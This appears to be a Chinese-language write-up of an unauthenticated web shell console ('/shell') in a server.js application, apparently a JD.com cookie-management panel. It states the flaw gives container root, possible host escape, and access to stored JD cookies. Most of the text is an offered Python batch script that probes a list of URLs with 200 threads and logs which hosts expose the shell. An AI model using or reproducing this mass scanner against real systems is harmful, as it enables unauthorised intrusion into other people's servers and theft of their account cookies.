0x01 漏洞檢測
漏洞payload: http://IP/shell
0x02 漏洞驗(yàn)證
在server.js代碼中, 使用了在線的shell控制臺, 該控制臺未進(jìn)行鑒權(quán), 導(dǎo)致存在未授權(quán)訪問
通過該漏洞獲取容器中的root權(quán)限, 可通過容器逃逸獲取宿主機(jī)權(quán)限
讀取的京東cookie
以下為批量腳本, 代碼比較粗糙,大佬勿噴
# -*- coding: utf-8 -*-
# @Time : 2021/6/30 9:07
# @Author : AD鈣奶
import json
import re
import time
import requests
import ssl
import threadpool
from loguru import logger
try:
requests.packages.urllib3.disable_warnings()
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
pass
else:
ssl._create_default_https_context = _create_unverified_https_context
def brute_force(_url):
urls = _url + '/shell'
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
"Cookie": "",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59",
}
try:
resp = requests.get(url=urls, headers=headers, timeout=20)
if resp.status_code == 200 and resp.headers['Set-Cookie']:
info1 = f"系統(tǒng)存在未授權(quán)漏洞,存在漏洞的網(wǎng)站: {str(urls)}"
filename1 = time.strftime("%Y-%m-%d-") + 'vuln_存在未授權(quán).txt'
save_vuln(filename1, info1)
logger.info(info1)
except Exception as e:
pass
def save_vuln(filename, info1):
file_path = './result/' + filename
with open(file_path, "a") as f:
info1 = info1 + '\n'
f.write(info1)
def open_file():
with open("url3.txt", 'r', encoding='UTF-8') as f:
urls = f.readlines()
urls = [url.strip() for url in urls if url and url.strip()]
return urls
def main():
url = open_file()
pool = threadpool.ThreadPool(200)
thread = threadpool.makeRequests(brute_force, url)
[pool.putRequest(req) for req in thread]
pool.wait()
if __name__ == '__main__':
main()
